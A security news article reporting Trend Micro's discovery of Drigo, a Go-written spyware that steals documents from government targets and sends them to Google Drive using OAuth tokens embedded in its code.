430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|Hackers Steal Data of 4.38 Million Aflac Japan Customers|Apple Fixes WebKit Flaws in iOS and macOS, With Help From AI Tools|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|Hackers Steal Data of 4.38 Million Aflac Japan Customers|Apple Fixes WebKit Flaws in iOS and macOS, With Help From AI Tools|
Advertisement

Ad Placeholder

Full Width × 90

Malware

Drigo spyware exploits Google Drive in targeted attacks

Security experts at TrendMicro have discovered a cyber espionage campaign which used a malware dubbed Drigo to syphon data through Google Drive. Security experts at TrendMicro have uncovered a new wave of targeted attacks which were stolen information through Google Drive. The researcher detected a new strain of data stealer malware, dubbed Drigo, that is apparently used in hacking […]

Drigo spyware exploits Google Drive in targeted attacks

Security experts at TrendMicro have discovered a cyber espionage campaign which used a malware dubbed Drigo to syphon data through Google Drive.

Security experts at TrendMicro have uncovered a new wave of targeted attacks which were stolen information through Google Drive. The researcher detected a new strain of data stealer malware, dubbed Drigo, that is apparently used in hacking campaigns targeting government agencies worldwide. The malware is able to syphon user’s files from the infected machine and sent it to Google Drive.

Drigo is able to steal common files including Excel, Word, PDF, text and PowerPoint files, including data in the Recycle Bin and User Documents folder, and upload them to Google Drive. The exploitation of cloud-based sharing sites is becoming even more frequent in the cybercrime ecosystem, in the last months security experts detected RAT served through these powerful platforms and phishing campaigns that benefited of SSL channels they ordinarily use.

The techniques spotted by the investigators are designed to  evade security vendors and researcher and in many cases are very sophisticated.

Drigo, in order to transfer the syphoned files to the Google Drive service includes in its source code the client_id, the client_secret and a refresh token (used for authentication process based on the OAuth 2.0 protocol).

“Refresh tokens are needed as part of the OAuth 2.0 protocol, which is used by Google Drive. This protocol is used by Twitter, Facebook and other sites to use their accounts to log in to a different website,” states Trend Micro threats analyst Kervin Alintanahin in a blog post. “Access tokens are used to have access on a Google Drive account. However, access tokens expire so refresh tokens are needed to get new access tokens. We decrypted communication from the malware and saw activity such as requests for new tokens and uploading files.”

The investigation allowed the experts to discover targeted attacks against government agencies, they speculate that Drigo malware has been designed for reconnaissance purposes.

Google Drive Drigo malware

“After all, one of the key aspects in a successful attack is having enough information on the target. The more information they can gather, the more vector of attack they can use on their target,” noted Alintanahin.

Another interesting discovery made by the experts is the use of the Go open source programming language, also known as golang, that was initially developed by Google.

“While interesting, the use of golang is not new; security researchers have seen golang-created malware as early as 2012. It would be hard to pinpoint the exact reason for using golang but some have attributed its appeal to its supposed lack of mainstream profile.” states the blog post.

TrendMicro has already alerted Google of the malicious activities related to the Google Drive account used by the bad actors, but as explained by the experts in the post, if the Drigo malware is able to update the configuration file, it’s possible that the attackers will use many other Google Drive accounts to continue their campains.

Pierluigi Paganini

(Security Affairs – Drigo malware, Google Drive)